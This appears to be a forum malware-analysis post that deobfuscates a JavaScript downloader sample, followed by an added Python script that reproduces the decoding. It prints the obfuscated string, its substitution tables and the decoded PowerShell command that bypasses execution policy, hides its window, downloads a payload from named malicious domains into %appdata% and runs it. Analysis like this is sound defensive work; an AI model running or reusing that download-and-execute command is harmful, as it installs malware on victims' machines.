- May 14, 2016
update :
Added one new sample:
From https://malwaretips.com/threads/28-11-2016-20.65943/
thanks to @Der.Reisende
7.js
1) Main difference :
SEE THE FIRST POST FOR EXPLANATIONS
Obfuscated Command Line String :
In function olymip()
var uwnizjiq = "uznehu,uk,uja,ynuja,ebz,uja,rydwo,tj,yuja,ox,Xyuja,ox,fuja,ydwo,ne,uja,fyuja,ox,liuja,v,uznehu,uk,fuja,ydwo,ne,POhalx,uznehu,yuja,ox,halx,rhalx,boqyuja,ox,,halx,coxj,halx,yuja,ox,halx,LLuja,rydwo,tj,yuja,ox,halx,xhalx,yuja,ox,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,halx,piqyuja,ox,ynuja,ebz,z,yuja,ox,xyuja,ox,uznehu,uk,Usfis,ihalx,oNPhalx,Ohalx,lIuznehu,uk,yfuja,ydwo,ne,halx,bhalx,Yhalx,Phalx,ydwo,halx,boqyuja,ox,,boqyuja,ox,,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,piqyuja,ox,ynuja,ebz,z,halx,nhalx,ohalx,phalx,ROFhalx,ilyuja,ox,halx,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,piqyuja,ox,ynuja,ebz,z,halx,uznehu,halx,Inhalx,ynuja,ebz,Ouznehu,boqyuja,ox,,sfis,halx,yhalx,Lyuja,ox,fuja,ydwo,ne,halx,coxj,ihalx,ynuja,ebz,halx,ynuja,ebz,halx,yuja,ox,nfuja,ydwo,ne,vovtu,Nyuja,ox,uznehu,halx,piqyuja,ox,ynuja,ebz,z,halx,Obhalx,Jyuja,ox,uznehu,uk,sfis,fuja,ydwo,ne,fuja,ydwo,ne,halx,boqyuja,ox,,yboqyuja,ox,,sfis,yuja,ox,halx,uja,uja,rydwo,tj,nhalx,yuja,ox,sfis,halx,uja,rydwo,tj,halx,uznehu,yuja,ox,halx,bhalx,uznehu,uk,halx,lhalx,ihalx,yuja,ox,nsfis,usikm,uja,rydwo,tj,halx,ynuja,ebz,Ouznehu,nhalx,loydwo,ynuja,ebz,halx,Fihalx,Lyuja,ox,vovtu,yvybk,coxj,sfis,sfis,pibydwo,gkyuja,ox,,uja,fyuja,ox,liuja,v,uja,fyuja,ox,liuja,v,uznehu,uznehu,uznehu,uja,rydwo,tj,ydwo,lyuja,ox,qopyuja,ox,nydwo,uja,rydwo,tj,sfis,opuja,fyuja,ox,liuja,v,uboqyuja,ox,,yuja,ox,ruja,rydwo,tj,pcoxj,p?f=1uja,rydwo,tj,ynuja,ebz,ydwo,sfis,yvybk,,yvybk,etal,ydwo,ppynuja,ebz,ydwo,sfis,ydwo,etal,uja,rydwo,tj,yuja,ox,xyuja,ox,yvybk,usikm,ufjovuznehu,u,boqyuja,ox,,sfis,ydwo,Rhalx,sfis,piqyuja,ox,ynuja,ebz,z,pROhalx,uznehu,uk,yuja,ox,boqyuja,ox,,boqyuja,ox,,fuja,ydwo,ne,halx,etal,ydwo,pPynuja,ebz,ydwo,sfis,ydwo,etal,uja,rydwo,tj,yuja,ox,xyuja,ox,"
Array of string with patterns that will be replaced by chars on the obfuscated Command Line String
var urcugeq = ['halx,', 'usikm,', "etal,", "uja,", 'ydwo,', "uznehu,", "coxj,", 'fmane,', 'ynmebz,', "mratj,", "wuk,", 'ymox,', 'ezmehc,', 'vovtu,', 'sfis,', "mfelimv,", "yvybk,", "boqe,", "ibagke,", 'piqedz,', 'ufjovwu,'];
Array of char that will replace the patterns from izyme on the obfuscated Command Line String
var regli = [
["ostirc", "guga", "^"][2],
["aqpidzafw", "teclu", ")"][2],
["oqobq", "fqiwy", '%'][2],
["elesqy", "fjemcatfo", "m"][2],
["qsajcih", "inaxz", 'a'][2],
["tliqywpo", "ulpiqim", "w"][2],
["huhmudf", "pbupmenu", 'h'][2],
["ysyvuc", "jjyve", " "][2],
["umzalo", "arwovz", "d"][2],
["onep", "ehesys", '.'][2],
["vocfe", "dwaczo", "c"][2],
["ovrym", "ksidijt", 'e'][2],
["jvagla", "olugir", "\,"][2],
["edwedsy", "ktopelxu", "("][2],
["orwynixz", "wbati", "t"][2],
["fqome", "wcypub", '/'][2],
["wipuc", "ixij", "'"][2],
["klytdy", "agmosfaxj", "s"][2],
["yxvokkuqs", "ykonipv", ':'][2],
["yxhuz", "esixdarj", "-"][2],
["nuxbu", "ufsyjpi", ';'][2]
];
["ostirc", "guga", "^"][2],
["aqpidzafw", "teclu", ")"][2],
["oqobq", "fqiwy", '%'][2],
["elesqy", "fjemcatfo", "m"][2],
["qsajcih", "inaxz", 'a'][2],
["tliqywpo", "ulpiqim", "w"][2],
["huhmudf", "pbupmenu", 'h'][2],
["ysyvuc", "jjyve", " "][2],
["umzalo", "arwovz", "d"][2],
["onep", "ehesys", '.'][2],
["vocfe", "dwaczo", "c"][2],
["ovrym", "ksidijt", 'e'][2],
["jvagla", "olugir", "\,"][2],
["edwedsy", "ktopelxu", "("][2],
["orwynixz", "wbati", "t"][2],
["fqome", "wcypub", '/'][2],
["wipuc", "ixij", "'"][2],
["klytdy", "agmosfaxj", "s"][2],
["yxvokkuqs", "ykonipv", ':'][2],
["yxhuz", "esixdarj", "-"][2],
["nuxbu", "ufsyjpi", ';'][2]
];
Here is the main change from the previous sample:
=> each char is at index 2!
The script makes the same operations to get the deobfuscated command line:
var regli = ["^", ")", "%", "m", "a", "w", "h", " ", "d", ".", "c", "e", ",", "(", "t", "/", "'", "s", ":", "-", ";"];
We get :
"cmd.eXe /c PO^we^r^s^h^e^LL.e^x^e ^-execUti^oNP^O^lIcy ^b^Y^P^a^ss -^n^o^p^ROF^ile^ -^w^In^dOwst^y^Le ^hi^d^d^en (New^-^Ob^Ject ^syste^m.n^et^.^we^b^c^l^i^ent).^dOwn^load^Fi^Le('http ://www .aleqopena.top/user.php?f=1.dat','%appdata%\exe');staR^t-pRO^cess ^%apPdata%\exe"
That means :
"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://www.aleqopena.top/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"
To find the run part : still the same method
- The command line deobfuscation is made by the function olymip()
=> a search with notepad gives :
var ohduxa = olymip();
=> a search on ohduxa gives :
case 66:
oxoqmekq["ru" + "n"](ohduxa, elykfej);
break;
oxoqmekq["ru" + "n"](ohduxa, elykfej);
break;
=> oxoqmekq["r" + "un"](ohduxa, elykfej);
var elykfej = 0;
ohduxa : commande line
=> oxoqmekq["run"](comnandLine, 0)ohduxa : commande line
=> shell.run(comnandLine, 0)
"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://www .aleqopena.top/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"
runs powershell.exe :
-executionpolicy bypass
=> allows to bypass the execution policy
-noprofile
=> launches the script in an untouched environment (it doesn't load the Windows PowerShell profile)
-windowstyle hidden
=> hides the powershell window
(new-object system.net.webclient).downloadfile('http ://www .brownalet.top/id.php?f=1.dat' ,'%appdata%\eXe');
=> creates a .NET object and uses its downloadfile method to download the payload and save it on HD
=> %appdata%\eXe
=> Example : C:\Users\DardiM\AppData\Roaming\eXe
start-process %appdata%\eXe
=> runs the payload
Payload:
C:\Users\DardiM\AppData\Roaming\eXe
URL :
http ://www .aleqopena.top/user.php?f=1.dat
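As an added example (not the post's own code, and not the sample's JavaScript), the Python script below reproduces the decoding step the post describes: it applies the urcugeq pattern table and the index-2 characters of regli, in table order, as global substitutions over the obfuscated string from the post, then strips the cmd.exe caret escapes and collapses whitespace the way the post's "That means" line does. The three data constants are copied from the post; the function names deobfuscate, cmd_unescape, normalize and defang are mine. The routine is general: swapping in another sample's two tables decodes that sample the same way.

```python
import re

# Obfuscated command line string from the post (the sample's own data, copied verbatim).
OBFUSCATED = "uznehu,uk,uja,ynuja,ebz,uja,rydwo,tj,yuja,ox,Xyuja,ox,fuja,ydwo,ne,uja,fyuja,ox,liuja,v,uznehu,uk,fuja,ydwo,ne,POhalx,uznehu,yuja,ox,halx,rhalx,boqyuja,ox,,halx,coxj,halx,yuja,ox,halx,LLuja,rydwo,tj,yuja,ox,halx,xhalx,yuja,ox,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,halx,piqyuja,ox,ynuja,ebz,z,yuja,ox,xyuja,ox,uznehu,uk,Usfis,ihalx,oNPhalx,Ohalx,lIuznehu,uk,yfuja,ydwo,ne,halx,bhalx,Yhalx,Phalx,ydwo,halx,boqyuja,ox,,boqyuja,ox,,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,piqyuja,ox,ynuja,ebz,z,halx,nhalx,ohalx,phalx,ROFhalx,ilyuja,ox,halx,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,piqyuja,ox,ynuja,ebz,z,halx,uznehu,halx,Inhalx,ynuja,ebz,Ouznehu,boqyuja,ox,,sfis,halx,yhalx,Lyuja,ox,fuja,ydwo,ne,halx,coxj,ihalx,ynuja,ebz,halx,ynuja,ebz,halx,yuja,ox,nfuja,ydwo,ne,vovtu,Nyuja,ox,uznehu,halx,piqyuja,ox,ynuja,ebz,z,halx,Obhalx,Jyuja,ox,uznehu,uk,sfis,fuja,ydwo,ne,fuja,ydwo,ne,halx,boqyuja,ox,,yboqyuja,ox,,sfis,yuja,ox,halx,uja,uja,rydwo,tj,nhalx,yuja,ox,sfis,halx,uja,rydwo,tj,halx,uznehu,yuja,ox,halx,bhalx,uznehu,uk,halx,lhalx,ihalx,yuja,ox,nsfis,usikm,uja,rydwo,tj,halx,ynuja,ebz,Ouznehu,nhalx,loydwo,ynuja,ebz,halx,Fihalx,Lyuja,ox,vovtu,yvybk,coxj,sfis,sfis,pibydwo,gkyuja,ox,,uja,fyuja,ox,liuja,v,uja,fyuja,ox,liuja,v,uznehu,uznehu,uznehu,uja,rydwo,tj,ydwo,lyuja,ox,qopyuja,ox,nydwo,uja,rydwo,tj,sfis,opuja,fyuja,ox,liuja,v,uboqyuja,ox,,yuja,ox,ruja,rydwo,tj,pcoxj,p?f=1uja,rydwo,tj,ynuja,ebz,ydwo,sfis,yvybk,,yvybk,etal,ydwo,ppynuja,ebz,ydwo,sfis,ydwo,etal,uja,rydwo,tj,yuja,ox,xyuja,ox,yvybk,usikm,ufjovuznehu,u,boqyuja,ox,,sfis,ydwo,Rhalx,sfis,piqyuja,ox,ynuja,ebz,z,pROhalx,uznehu,uk,yuja,ox,boqyuja,ox,,boqyuja,ox,,fuja,ydwo,ne,halx,etal,ydwo,pPynuja,ebz,ydwo,sfis,ydwo,etal,uja,rydwo,tj,yuja,ox,xyuja,ox,"

# Pattern table (urcugeq in the sample) and, in the same order, the replacement
# characters (index 2 of each regli triple).
PATTERNS = ['halx,', 'usikm,', 'etal,', 'uja,', 'ydwo,', 'uznehu,', 'coxj,', 'fmane,',
            'ynmebz,', 'mratj,', 'wuk,', 'ymox,', 'ezmehc,', 'vovtu,', 'sfis,', 'mfelimv,',
            'yvybk,', 'boqe,', 'ibagke,', 'piqedz,', 'ufjovwu,']
CHARS = ['^', ')', '%', 'm', 'a', 'w', 'h', ' ', 'd', '.', 'c', 'e', ',', '(', 't', '/',
         "'", 's', ':', '-', ';']


def deobfuscate(blob, patterns, chars):
    """Replace every occurrence of patterns[i] with chars[i], in table order.

    The order is essential: tokens such as 'mratj,' (-> '.') or 'wuk,' (-> 'c') do
    not exist in the raw blob; they only appear after earlier rows ('uja,' -> 'm',
    'ydwo,' -> 'a', 'uznehu,' -> 'w') have been applied.
    """
    if len(patterns) != len(chars):
        raise ValueError("pattern and char tables must have the same length")
    out = blob
    for pat, ch in zip(patterns, chars):
        out = out.replace(pat, ch)          # global, literal replacement
    return out


def decode():
    """Stage 1: the command line exactly as the script hands it to shell.run()."""
    return deobfuscate(OBFUSCATED, PATTERNS, CHARS)


def cmd_unescape(s):
    """Remove cmd.exe caret escapes: '^X' becomes 'X', so '^^' becomes '^'."""
    out, i = [], 0
    while i < len(s):
        if s[i] == '^' and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return ''.join(out)


def normalize(s):
    """Stage 2: what actually reaches PowerShell (escapes gone, spacing and case folded)."""
    return re.sub(r"\s+", " ", cmd_unescape(s)).lower().strip()


def defang(s):
    """Break URLs for safe display, e.g. http://a.b/x -> http[://]a[.]b/x."""
    return re.sub(r"https?://[^\s'\"]+",
                  lambda m: m.group(0).replace("://", "[://]").replace(".", "[.]"), s)


if __name__ == "__main__":
    raw = decode()
    print("stage 1 (cmd.exe escapes intact):")
    print(defang(raw))
    print("stage 2 (escapes removed, whitespace collapsed, lower-cased):")
    print(defang(normalize(raw)))
```

Running the script prints the two forms the post lists under "We get" and "That means" (URLs defanged). One observation from the tables as they appear on the page: regli contains no backslash entry, so the decoded download target comes out as `%appdata%.exe` rather than the `\eXe` written in the post; the page does not say whether that is a transcription artefact.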